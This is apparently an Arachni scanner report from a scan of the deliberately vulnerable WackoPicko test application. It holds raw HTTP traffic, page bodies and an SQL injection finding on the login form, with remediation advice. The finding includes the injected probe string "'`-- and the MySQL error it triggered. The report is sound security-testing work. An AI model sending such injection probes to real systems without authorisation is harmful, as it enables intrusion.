        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Proof
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
comment
name
comment
name
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

SQL Injection 1 sql_injection

Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.

An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.

Remediation guidance

The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.

Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.

Affected platform type belongs to the Databases category, identified as MySQL.

Injected seed Signature Proof
"'`--
MySQL server version for the right syntax to use
MySQL server version for the right syntax to use
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<form action="/WackoPicko/users/login.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="login">
      </input>
    </td>
    <td>
      <a href="/WackoPicko/users/register.php">
        Register
      </a>
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/login.php http://192.168.0.26/WackoPicko/users/login.php
username
password
username
arachni_name"'`--
password
5543!%arachni_secret
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
